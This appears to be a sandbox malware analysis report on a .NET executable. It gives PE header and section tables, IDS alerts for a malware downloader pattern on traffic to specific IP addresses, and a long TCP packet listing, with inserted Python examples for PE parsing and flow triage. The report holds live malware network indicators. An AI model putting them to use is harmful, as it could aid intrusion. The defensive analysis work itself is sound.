                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66DE4427 [Mon Sep 9 00:41:11 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c38 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x5a6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc94 | 0xe00 | dd5605ee7baf6ea3867e8966ac7f3f55 | False | 0.5415736607142857 | data | 5.040385941640028 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x5a6 | 0x600 | ca94ddebdb95a1c56a83a191de7faac4 | False | 0.4173177083333333 | data | 4.075974040120256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6000 | 0xc | 0x200 | 880af27eaae1f8845d7921a8312b435f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x40a0 | 0x31c | data | - | - | 0.4321608040201005
RT_MANIFEST | 0x43bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
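The static tables above are what a triage script derives from the PE headers: each data directory's RVA and size, the section that RVA falls in, and per-section entropy. The detail that matters most for this sample is that IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is non-empty (the CLR header) and the only native import is mscoree.dll!_CorExeMain, which together identify a managed .NET executable whose real logic lives in IL, not in the x86 bytes at the entry point. The following is an added example, not code from Joe Sandbox or from the sample; build_sample_pe() constructs a minimal PE32 in memory whose directory layout is modelled on the report so the parser can run offline, and the constants and helper names are the example's own.

```python
"""Parse a PE's data directories and section table into the columns the report
lists (RVA, size, containing section, entropy) and flag the CLR header that,
with the lone mscoree.dll!_CorExeMain import, marks a .NET executable.
build_sample_pe() constructs a minimal PE32 for the demo; it is not the
analysed sample, only its directory layout is modelled on the report."""
import math
import struct

DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
                   "BASERELOC", "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG",
                   "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
SCN_CODE, SCN_IDATA = 0x00000020, 0x00000040
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Return directories as (name, rva, size, section), the sections, a .NET flag."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                  # PE32: NumberOfRvaAndSizes at +92, entries at +96
        ndirs_off = opt + 92
    elif magic == 0x20B:                # PE32+: 64-bit fields push them to +108 / +112
        ndirs_off = opt + 108
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = min(struct.unpack_from("<I", data, ndirs_off)[0], 16)
    raw_dirs = [struct.unpack_from("<II", data, ndirs_off + 4 + 8 * i) for i in range(ndirs)]

    sections = []
    for i in range(nsect):              # 40-byte IMAGE_SECTION_HEADERs follow the optional header
        h = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({
            "name": h[0].rstrip(b"\0").decode("ascii", "replace"),
            "vsize": h[1], "va": h[2], "rawsize": h[3], "flags": h[9],
            "entropy": shannon_entropy(data[h[4]:h[4] + h[3]]),
            "wx": bool(h[9] & SCN_WRITE and h[9] & SCN_EXEC),   # RWX code: unpacker tell
        })

    def section_of(rva):
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return s["name"]
        return None

    directories = [(DIRECTORY_NAMES[i], rva, size, section_of(rva) if rva else None)
                   for i, (rva, size) in enumerate(raw_dirs)]
    clr = dict((d[0], d) for d in directories).get("COM_DESCRIPTOR")
    return {"machine": machine, "directories": directories, "sections": sections,
            "is_dotnet": bool(clr and clr[1] and clr[2])}


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the report's sample): IAT at 0x2000 and CLR header at
    0x2008 inside .text, resources in .rsrc, every other directory empty."""
    text_body = bytes(range(256)) * 4    # 0x400 bytes, every value 4 times: entropy 8.0
    rsrc_body = bytes(0x200)             # all zero: entropy 0.0
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2] = (0x2C38, 0x53), (0x4000, 0x5A6)    # IMPORT, RESOURCE
    dirs[12], dirs[14] = (0x2000, 0x8), (0x2008, 0x48)    # IAT, COM_DESCRIPTOR
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 8, 0, len(text_body), len(rsrc_body), 0, 0x2C8E, 0x2000, 0x4000,
                      0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x5000, 0x200, 0, 3, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0xC94, 0x2000, len(text_body), 0x200,
                       0, 0, 0, 0, SCN_CODE | SCN_EXEC | SCN_READ)
    sect += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x5A6, 0x4000, len(rsrc_body), 0x600,
                        0, 0, 0, 0, SCN_IDATA | SCN_READ)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    headers = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + sect
    return headers.ljust(0x200, b"\0") + text_body + rsrc_body


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    for name, rva, size, sec in info["directories"]:
        print(f"{name:<15} {rva:#8x} {size:#6x} {sec or ''}")
    print(".NET (CLR header present):", info["is_dotnet"])
```

Against a real file, replace build_sample_pe() with open(path, "rb").read(); the .text entropy of 5.04 in the table above is typical for uncompressed IL, whereas a packed or encrypted payload pushes a section toward 7.5 or more, and a writable+executable section (the wx flag) is the other header-level hint that code will be rewritten at run time.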
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-09T08:55:16.251452+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:17.251451+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:17.814271+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49719 | 188.114.96.3 | 443 | TCP
2024-09-09T08:55:18.642109+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49720 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:21.173447+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49723 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:23.548357+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49725 | 132.226.8.169 | 80 | TCP
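The IDS table above and the per-packet TCP listing that follows are keyed on the same 4-tuples, so the useful triage step is to fold the packets into flows and attach the alerts that fired on each one; the alerted connections to 132.226.8.169:80 and 188.114.96.3:443 then stand out from the long TLS exchange with 135.181.160.46. The following is an added example, not part of the Joe Sandbox report: the rows it parses are constructed for the demo in the column order of the two tables (pipe-separated), with 4-tuples and SIDs copied from the report but packet counts that are not, and the 192.168.2.0/24 analysis subnet is an assumption.

```python
"""Fold per-packet TCP rows into flows and attach the IDS alerts that fired on
the same client/server 4-tuple. Rows below are constructed for this example in
the column order of the sandbox's alert and packet tables; the 4-tuples and SIDs
follow the report, the packet counts do not."""
import ipaddress

LOCAL_NET = ipaddress.ip_network("192.168.2.0/24")   # analysis VM subnet (assumption)

ALERT_ROWS = """\
2024-09-09T08:55:16.251452+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:17.251451+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:17.814271+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49719 | 188.114.96.3 | 443 | TCP
""".splitlines()

PACKET_ROWS = """\
Sep 9, 2024 08:54:55.550035954 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:55.550084114 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.268280983 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:55:16.100000000 CEST | 49713 | 80 | 192.168.2.6 | 132.226.8.169
Sep 9, 2024 08:55:16.300000000 CEST | 80 | 49713 | 132.226.8.169 | 192.168.2.6
Sep 9, 2024 08:55:17.700000000 CEST | 49719 | 443 | 192.168.2.6 | 188.114.96.3
""".splitlines()


def flow_key(src, sport, dst, dport):
    """Canonical (client, cport, server, sport); the LOCAL_NET side is the client."""
    if ipaddress.ip_address(src) in LOCAL_NET:
        return (src, int(sport), dst, int(dport)), "out"
    return (dst, int(dport), src, int(sport)), "in"


def summarize(packet_rows, alert_rows):
    """Map flow key -> {first, last, out, in, alerts: [(sid, severity, signature)]}."""
    flows = {}
    for row in packet_rows:
        ts, sport, dport, src, dst = [f.strip() for f in row.split("|")]
        key, direction = flow_key(src, sport, dst, dport)
        flow = flows.setdefault(key, {"first": ts, "last": ts, "out": 0, "in": 0, "alerts": []})
        flow["last"] = ts
        flow[direction] += 1
    for row in alert_rows:
        ts, sid, sig, sev, src, sport, dst, dport, proto = [f.strip() for f in row.split("|")]
        if proto != "TCP":
            continue
        key, _ = flow_key(src, sport, dst, dport)
        # An alert on a 4-tuple with no listed packets still gets an entry, so it is not lost.
        flow = flows.setdefault(key, {"first": ts, "last": ts, "out": 0, "in": 0, "alerts": []})
        flow["alerts"].append((int(sid), int(sev), sig))
    return flows


def triage_order(flows):
    """Flow keys, alerted flows first, highest severity (lowest number) first."""
    def rank(item):
        key, flow = item
        best = min((sev for _, sev, _ in flow["alerts"]), default=99)
        return (best, key)
    return [key for key, _ in sorted(flows.items(), key=rank)]


if __name__ == "__main__":
    flows = summarize(PACKET_ROWS, ALERT_ROWS)
    for key in triage_order(flows):
        f = flows[key]
        sids = sorted({sid for sid, _, _ in f["alerts"]})
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  out={f['out']} in={f['in']}  sids={sids}")
```

Pulling the client side from LOCAL_NET rather than from the lower port number keeps the key stable for both directions of a connection, which is what lets the alert table (always written client to server) join onto packet rows that alternate direction.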
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 08:54:55.550035954 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:55.550084114 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:55.550168991 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:55.563877106 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:55.563893080 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.268280983 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.268399000 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.272428036 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.272438049 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.272679090 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.329550982 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.348726034 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.396500111 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690891027 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690917969 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690926075 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690952063 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690964937 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.690969944 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.691040993 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.691065073 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.691139936 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.692837000 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.692854881 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.692943096 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.692949057 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.735846043 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.796092033 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.796118975 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.796327114 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.796346903 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.796400070 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.799290895 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.799308062 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.799386978 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.799397945 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.799438953 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.801459074 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.801480055 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.801532984 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.801538944 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.801553011 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.801580906 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.844454050 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.844497919 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.844702005 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.844716072 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.844780922 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.904742956 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.904771090 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.904838085 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.904849052 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.904896021 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.904896021 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.905673027 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.905694008 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.905778885 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.905786037 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.905834913 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.907480955 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.907495022 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.907579899 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.907586098 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.907624960 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.908571959 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.908587933 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.908648014 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.908653975 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.908703089 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.935439110 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.935463905 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.935703993 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.935710907 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.935805082 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.996886015 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.996920109 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.997138977 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.997153044 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.997201920 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.997378111 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.997395992 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.997456074 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:56.997461081 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:56.997535944 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.012737036 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.012756109 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.012844086 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.012852907 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.013022900 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.013633966 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.013650894 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.013750076 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.013756037 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.013823032 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.014487982 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.014516115 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.014570951 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.014575958 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.014594078 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.014616966 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.027772903 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.027797937 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.027884007 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.027892113 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.028074980 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.089224100 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.089278936 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.089370012 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.089379072 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.089400053 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.089442968 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.089993000 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.090013027 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.090059996 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.090064049 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.090095043 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.090109110 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.111474037 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.111517906 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.111608028 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.111613989 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.111680984 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.111979961 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112024069 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112059116 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.112062931 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112087011 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.112112999 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.112287045 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112313032 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112370968 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.112375975 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.112404108 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.112422943 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.121716976 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.121750116 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.121853113 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.121860027 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.121922016 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.122332096 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.122379065 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.122417927 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.122432947 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.122446060 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.122471094 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.183583021 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.183619022 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.183760881 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.183769941 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.183819056 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.184499979 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.184518099 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
